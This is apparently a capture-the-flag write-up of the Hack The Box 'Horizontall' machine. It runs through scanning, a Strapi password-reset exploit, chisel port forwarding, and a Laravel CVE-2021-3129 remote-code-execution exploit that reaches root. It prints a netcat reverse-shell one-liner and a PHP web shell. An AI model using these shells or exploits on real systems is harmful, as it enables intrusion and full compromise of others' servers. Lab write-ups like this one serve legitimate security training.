root💀muzec-sec:~#

Hack. Sleep. Repeat

View on GitHub

image

We always start with an nmap scan…..

nmap -p- --min-rate 10000 -oA nmap/allports -v IP
# Nmap 7.91 scan initiated Thu Dec 30 08:30:37 2021 as: nmap -p- --min-rate 10000 -oA nmap/allports -v 10.10.11.105
Warning: 10.10.11.105 giving up on port because retransmission cap hit (10).
Increasing send delay for 10.10.11.105 from 320 to 640 due to 570 out of 1899 dropped probes since last increase.
Increasing send delay for 10.10.11.105 from 640 to 1000 due to 1398 out of 4658 dropped probes since last increase.
Nmap scan report for 10.10.11.105
Host is up (0.24s latency).
Not shown: 52107 closed ports, 13426 filtered ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Read data files from: /usr/bin/../share/nmap
# Nmap done at Thu Dec 30 08:31:48 2021 -- 1 IP address (1 host up) scanned in 70.64 seconds

Interesting two open ports let throw some service detection and scripts switch on it to confirm what we have running on it we can already see it SSH and HTTP but let keep it flashy lol.

nmap -sC -sV -oA nmap/normal -p 22,80 IP
# Nmap 7.91 scan initiated Thu Dec 30 08:32:40 2021 as: nmap -sC -sV -oA nmap/normal -p 22,80 10.10.11.105
Nmap scan report for horizontall.htb (10.10.11.105)
Host is up (0.35s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 ee:77:41:43:d4:82:bd:3e:6e:6e:50:cd:ff:6b:0d:d5 (RSA)
|   256 3a:d5:89:d5:da:95:59:d9:df:01:68:37:ca:d5:10:b0 (ECDSA)
|_  256 4a:00:04:b4:9d:29:e7:af:37:16:1b:4f:80:2d:98:94 (ED25519)
80/tcp open  http    nginx 1.14.0 (Ubuntu)
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: horizontall
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Dec 30 08:32:58 2021 -- 1 IP address (1 host up) scanned in 18.10 seconds

Now that is more flashy we are checking the HTTP first make sure to add IP and horizontall.htb to your host file.

image

Now next thing to do is to check the source page but we got nothing let burst some directories and subdomain to find some hidden page.

┌──(muzec㉿Muzec-Security)-[~/Documents/HTB/10.10.11.105]                                                                                                              
└─$ gobuster dir -u http://horizontall.htb/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x txt,php,html,bak,sh -o gobuster.req
/index.html           (Status: 200) [Size: 901]
/img                  (Status: 301) [Size: 194] [--> http://horizontall.htb/img/]
/css                  (Status: 301) [Size: 194] [--> http://horizontall.htb/css/]
/js                   (Status: 301) [Size: 194] [--> http://horizontall.htb/js/]

But i got nothing on the domain let check subdomain.

┌──(muzec㉿Muzec-Security)-[~/Documents/HTB/10.10.11.105]
└─$ gobuster vhost -u http://horizontall.htb/ -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt  
Found: api-prod.horizontall.htb (Status: 200) [Size: 413]

Boom we got a subdomain which is cool add again to our host file now let access it to see what in store for us.

image

We got a welcome message and the rest is blank so i try adding /admin and the back of the subdomain you can also burst directories you will get it i just guess it and boom it work.

image

Seems we are dealing with strapi cms using some default credentials and we got no luck let see what we can find on google.

http://api-prod.horizontall.htb/admin/strapiVersion

image

We found the version let confirm if the version is vulnerable.

image

Boom let download the exploit to try it out.

┌──(muzec㉿Muzec-Security)-[~/Documents/HTB/10.10.11.105]
└─$ python3 50239.py http://api-prod.horizontall.htb/
[+] Checking Strapi CMS Version running
[+] Seems like the exploit will work!!!
[+] Executing exploit


[+] Password reset was successfully
[+] Your email is: admin@horizontall.htb
[+] Your new credentials are: admin:SuperStrongPassword1
[+] Your authenticated JSON Web Token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MywiaXNBZG1pbiI6dHJ1ZSwiaWF0IjoxNjQxMzAxNDYxLCJleHAiOjE2NDM4OTM0NjF9.50jv0hWWZ3KBCn-U0EIA2qNHkE7e4ddOrksf0yQuzbI


$> 

We are in but when i try to run a command i got some error.

image

Smooth let try to transfer the shell.

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f

Ncat ready to catch the reverse shell.

┌──(muzec㉿Muzec-Security)-[~/Documents/HTB/10.10.11.105]
└─$ nc -nvlp 1337 
listening on [any] 1337 ...

image

Boom more better let spawn a full tty shell.

image

Now let get the user.txt first.

image

Boom now let try to move our privilege.

image

Found a credentials but when i try to use it for the user developer i got no luck so let check for SUID .

image

Nothing also let check what ports we have running locally with us.

ss -tulpn

image

Boom we have a port let try to port forward using chisel first of all we need to transfer a copy of chisel binary to the target.

image

Now let start the server on our attacking machine.

./chisel server -p 9000 --reverse &

image

Now on the target.

./chisel client 10.10.14.7:9000 R:9001:127.0.0.1:8000 &

image

We are ready to access it now.

127.0.0.1:9001

image

Boom we found a Laravel v8 (PHP v7.4.18) version seems cool let confirm if it vulnerable.

image

Boom jackpot let give it a shot.

┌──(muzec㉿Muzec-Security)-[~/Documents/HTB/10.10.11.105/CVE-2021-3129]
└─$ python3 exploit.py
[*] Try to use monolog_rce1 for exploitation.
[*] Result:
uid=0(root) gid=0(root) groups=0(root)

[*] Try to use monolog_rce2 for exploitation.
[*] Result:
uid=0(root) gid=0(root) groups=0(root)

[*] Try to use monolog_rce3 for exploitation.
[*] Result:
[-] RCE echo is not found.

Exploit working now let try to get a reverse shell let edit the exploit to wget our shell file to the server.

//Save in shell.php//

<?php system ($_GET['cmd']); ?>

Now let start our python server.

┌──(muzec㉿Muzec-Security)-[~/Documents/HTB/10.10.11.105]
└─$ python -m SimpleHTTPServer                       
Serving HTTP on 0.0.0.0 port 8000 ...

image

Now let save and run the exploit again.

image

Which confirm our file has been transfered let confirm it.

image

Flashy right hehehehehe let get a reverse shell back to our terminal now.

image

Bruhhhhhhhh you just got yourself a root you are l33t and thanks for reading my writeup between peace out.

Greeting From Muzec



Back To Home